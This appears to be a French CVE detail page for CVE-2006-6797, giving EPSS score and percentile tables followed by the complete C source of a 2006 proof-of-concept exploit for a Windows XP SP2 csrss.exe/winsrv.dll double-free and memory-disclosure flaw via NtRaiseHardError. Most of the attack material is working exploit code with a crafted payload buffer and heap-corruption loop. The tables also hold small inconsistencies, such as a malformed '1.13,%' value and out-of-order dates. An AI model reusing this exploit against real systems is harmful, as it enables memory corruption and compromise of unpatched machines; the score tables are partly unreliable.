CVE-2006-6797 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	2.22%	–	–
2022-02-27	–	–	2.22%	–	–
2022-04-03	–	–	2.22%	–	–
2022-04-10	–	–	2.22%	–	–
2022-09-18	–	–	2.22%	–	–
2023-03-12	–	–	–	0.11%	–
2023-03-19	–	–	–	0.08%	–
2023-04-09	–	–	–	0.08%	–
2023-04-30	–	–	–	0.09%	–
2023-06-04	–	–	–	0.08%	–
2023-07-16	–	–	–	0.08%	–
2024-02-11	–	–	–	0.08%	–
2024-04-07	–	–	–	0.08%	–
2024-06-02	–	–	–	0.12%	–
2024-06-30	–	–	–	0.12%	–
2024-08-04	–	–	–	0.12%	–
2024-08-11	–	–	–	0.12%	–
2024-09-08	–	–	–	0.08%	–
2024-11-24	–	–	–	0.08%	–
2024-12-22	–	–	–	0.1%	–
2025-03-09	–	–	–	0.1%	–
2025-01-19	–	–	–	0.1%	–
2025-03-09	–	–	–	0.1%	–
2025-03-18	–	–	–	–	1.28%
2025-03-30	–	–	–	–	1.13%
2025-04-15	–	–	–	–	1.13%
2025-04-15	–	–	–	–	1.13,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	58%
2022-02-27	59%
2022-04-03	79%
2022-04-10	8%
2022-09-18	81%
2023-03-12	42%
2023-03-19	31%
2023-04-09	32%
2023-04-30	38%
2023-06-04	33%
2023-07-16	34%
2024-02-11	33%
2024-04-07	34%
2024-06-02	45%
2024-06-30	46%
2024-08-04	45%
2024-08-11	46%
2024-09-08	36%
2024-11-24	37%
2024-12-22	42%
2025-03-09	43%
2025-01-19	42%
2025-03-09	43%
2025-03-18	78%
2025-03-30	76%
2025-04-15	77%
2025-04-15	77%

///////////////////////////////////////// ///////////////////////////////////////// ///// Microsoft Windows NtRaiseHardError ///// Csrss.exe-winsrv.dll Double Free ///////////////////////////////////////// ///// Ruben Santamarta ///// ruben at reversemode dot com ///// www.reversemode.com ///////////////////////////////////////// ///// 12.29.2006 ///// For educational purposes ONLY ///// Compiled using gcc (Dev-C++) //////////////////////////////////////// ////// XP SP2 //////////////////////////////////////// #include <stdio.h> #include <windows.h> #include <winbase.h> #include <ntsecapi.h> #define UNICODE #define MAGIC_VALUE 0x75b4cd40 // winsrv.dll data section BOOL gFon=FALSE; typedef LONG NTSTATUS; typedef NTSTATUS (WINAPI *PNTRAISE)(NTSTATUS, ULONG, ULONG, PULONG, UINT, PULONG); // Csrss.exe memory monitor thread // (Read csrss.exe memory disclosure exploit for details) VOID WINAPI ReadBox2( LPVOID param ) { HWND hWindow,hButton,hText; DWORD hChunk,cHeader=0; int i=0,b=0; int gTemp; char lpTitle[300]; char lpText[300]; char lpBuff[500]; ZeroMemory((LPVOID)lpTitle,250); ZeroMemory((LPVOID)lpText,250); ZeroMemory((LPVOID)lpBuff,300); Sleep(2000); for (;;) { lpText[0]=(BYTE)""; Sleep(1000); hWindow = FindWindow("#32770",NULL); ZeroMemory((LPVOID)lpTitle,250); ZeroMemory((LPVOID)lpText,250); ZeroMemory((LPVOID)lpBuff,300); if(hWindow != NULL) { GetWindowText(hWindow,(LPSTR)&lpTitle,250); if(strcmp(lpTitle,"Aa")!=0) { hText=FindWindowEx(hWindow,0,"static",0); GetWindowText(hText,(LPSTR)&lpText,250); hText=GetNextWindow(hText,GW_HWNDNEXT); GetWindowText(hText,(LPSTR)&lpText,250); cHeader=*(DWORD*)lpText; if( cHeader!=0) { if(cHeader >0x100000 && cHeader<0x400000) { printf("\n**************************\n"); printf("Heap Chunk Found! Good Luck!\n"); printf("New Value: 0x%p",cHeader); printf("\n**************************\n"); } else { printf("\n****************************\n"); printf("winsrv.dll data overwritten! \n"); printf("New Value: 0x%p",cHeader); printf("\n****************************\n"); } } else { printf("\n****************************\n"); printf("nothing found! "); printf("\n****************************\n"); } cHeader=*(DWORD*)lpTitle; if( cHeader!=0) { if(cHeader >0x100000 && cHeader<0x400000) { printf("\n**************************\n"); printf("Heap Chunk Found! Good Luck!\n"); printf("New Value: 0x%p",cHeader); printf("\n**************************\n"); } else { printf("\n****************************\n"); printf("winsrv.dll data overwritten! \n"); printf("New Value: 0x%p",cHeader); printf("\n****************************\n"); } } else { printf("\n****************************\n"); printf("nothing found! "); printf("\n****************************\n"); } } SendMessage(hWindow,WM_CLOSE,0,0); ZeroMemory((LPVOID)lpTitle,250); ZeroMemory((LPVOID)lpText,250); ZeroMemory((LPVOID)lpBuff,300); } CloseHandle(hWindow); } } VOID WINAPI ReadBox( LPVOID param ) { HWND hWindow; for (;;) { Sleep(1000); if(!gFon) { hWindow = FindWindow("#32770",NULL); if(hWindow != NULL ) { SendMessage(hWindow,WM_CLOSE,0,0); } } } } int main() { UNICODE_STRING uStr={5,5,L"fun!"}; ULONG retValue,args[]={MAGIC_VALUE,MAGIC_VALUE,(ULONG)&uStr}; PNTRAISE NtRaiseHardError; DWORD dwThreadId; byte *ShellCode ="\x5C\x3F\x3F\x5C\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75"; int i=0; NtRaiseHardError=(PNTRAISE)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtRaiseHardError"); system("cls"); printf("##########################################\n"); printf("### Microsoft Windows NtRaiseHardError ###\n"); printf("### Csrss.exe-winsrv.dll Double-Free ###\n"); printf("## Ruben Santamarta www.reversemode.com ##\n"); printf("##########################################\n"); printf("## + Csrss.exe Double-Free Exploit ##\n"); printf("## + Csrss.exe Memory Disclosure Exploit##\n"); printf("##########################################\n"); printf("# XP SP 2 #\n"); printf("##########################################\n\n"); printf("\nThe exploit overwrites controlled addresses\n"); printf("in winsrv.dll data section within Csrss.exe\n\n"); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)ReadBox, 0, 0, &dwThreadId); // Seeding the heap for(i=0;i<2;i++) MessageBoxA(0,"\x40\xcd\xb4\x75","\x40\xcd\xb4\x75", MB_SERVICE_NOTIFICATION); // Exploiting Csrss.exe Double-Free printf("[*] Stage 1 -= Hitting Heap =-\n\n") ; printf("[+] Corrupting the heap (11 attemps)\n\n"); for( i=0; i<11; i++) { printf("#%d... ",i+1); MessageBoxA(0, ShellCode,"A", MB_SERVICE_NOTIFICATION); } gFon=TRUE; printf("\n\n[*] Stage 2 -= Scanning winsrv.dll data section =-\n\n") ; Sleep(2000); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)ReadBox2, 0, 0, NULL); args[0]-=0x20; // Exploiting Csrss.exe memory disclosure flaw for(i=0;i<0xF;i++) { args[0]+=4; printf("\n#%d Reading at : [0x%p]\n",i,args[0]); NtRaiseHardError(0x50000018,3,4,args,1,&retValue); } printf("\n[+] Exploit exiting\n\n"); printf("#############################################################\n"); printf("If you didn't find anything, run the exploit one more time!\n"); printf("If you find a heap chunk address, enjoy!\n"); printf("#############################################################\n"); } // milw0rm.com [2006-12-31]